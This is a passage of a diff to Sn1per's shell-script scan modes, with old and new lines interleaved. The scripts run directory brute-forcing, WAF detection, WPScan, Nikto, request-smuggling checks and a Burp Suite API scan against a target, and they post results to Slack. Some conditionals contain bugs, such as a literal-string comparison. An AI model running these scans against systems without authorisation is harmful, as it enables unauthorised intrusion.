diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" ]]; then
|
||||
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
source $INSTALL_DIR/modes/static-grep-search.sh
|
||||
|
|
@ -265,16 +268,19 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
|
|
@ -399,11 +405,13 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" ]]; then
|
||||
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null >> $LOOT_DIR/web/spider-new-$TARGET.txt
|
||||
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
source $INSTALL_DIR/modes/static-grep-search.sh
|
||||
|
|
@ -417,16 +425,18 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
|
||||
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null >> $LOOT_DIR/web/dirsearch-new-$TARGET.txt
|
||||
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
|
|
@ -488,9 +498,10 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
echo -e ""
|
||||
echo -e ""
|
||||
|
|
|
|||
|
|
@ -22,9 +22,10 @@ if [[ "$MODE" = "vulnscan" ]]; then
|
|||
exit
|
||||
fi
|
||||
logo
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
|
|
@ -123,9 +124,10 @@ if [[ "$MODE" = "vulnscan" ]]; then
|
|||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
|
||||
fi
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
loot
|
||||
exit
|
||||
|
|
|
|||
|
|
@ -18,9 +18,10 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
exit
|
||||
|
|
@ -73,8 +74,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
nmap $NMAP_OPTIONS -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-http-$TARGET.xml
|
||||
port_http=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-http-$TARGET.xml | grep open`
|
||||
port_http=$PORT
|
||||
if [[ -z "$port_http" ]]; then
|
||||
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
|
||||
else
|
||||
|
|
@ -103,7 +103,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wafw00f http://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-http-port$PORT.txt 2> /dev/null
|
||||
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http-port80.txt 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [[ "$WHATWEB" == "1" ]]; then
|
||||
|
|
@ -199,10 +199,15 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null > $LOOT_DIR/web/spider-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -222,7 +227,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x $WEB_BRUTE_EXCLUDE_CODES -F -e "$WEB_BRUTE_EXTENSIONS" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-common.txt
|
||||
|
|
@ -233,7 +238,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-full.txt
|
||||
|
|
@ -244,7 +249,7 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
fi
|
||||
if [[ "$GOBUSTER" == "1" ]]; then
|
||||
gobuster -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -e | tee $LOOT_DIR/web/webbrute-$TARGET-http-port$PORT-exploits.txt
|
||||
|
|
@ -256,7 +261,11 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null > $LOOT_DIR/web/dirsearch-new-$TARGET.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt| awk '{print $1}') > 3 ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -283,10 +292,16 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
|
||||
echo ""
|
||||
if [[ "$WP_API_KEY" ]]; then
|
||||
wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks --api-key $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks --api-key $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
|
||||
echo ""
|
||||
else
|
||||
wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
|
||||
fi
|
||||
fi
|
||||
if [[ "$NIKTO" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -322,14 +337,69 @@ if [[ "$MODE" = "webporthttp" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py -u http://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u http://$TARGET:$PORT | tee $LOOT_DIR/web/smuggler-$TARGET-port${PORT}.txt
|
||||
fi
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/web_autopwn.sh
|
||||
source $INSTALL_DIR/modes/osint_stage_2.sh
|
||||
fi
|
||||
if [[ "$BURP_SCAN" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}"
|
||||
echo ""
|
||||
for a in {1..30};
|
||||
do
|
||||
echo -n "[-] SCAN #$a: "
|
||||
curl -sI "http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a" | grep HTTP | awk '{print $2}'
|
||||
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
|
||||
while [[ ${#BURP_STATUS} -gt "5" ]];
|
||||
do
|
||||
BURP_STATUS=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining")
|
||||
BURP_STATUS_FULL=$(curl -s http://$BURP_HOST:$BURP_PORT/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3)
|
||||
echo "[i] STATUS: $BURP_STATUS_FULL"
|
||||
sleep 15
|
||||
done
|
||||
done
|
||||
echo "[+] VULNERABILITIES: "
|
||||
echo "----------------------------------------------------------------"
|
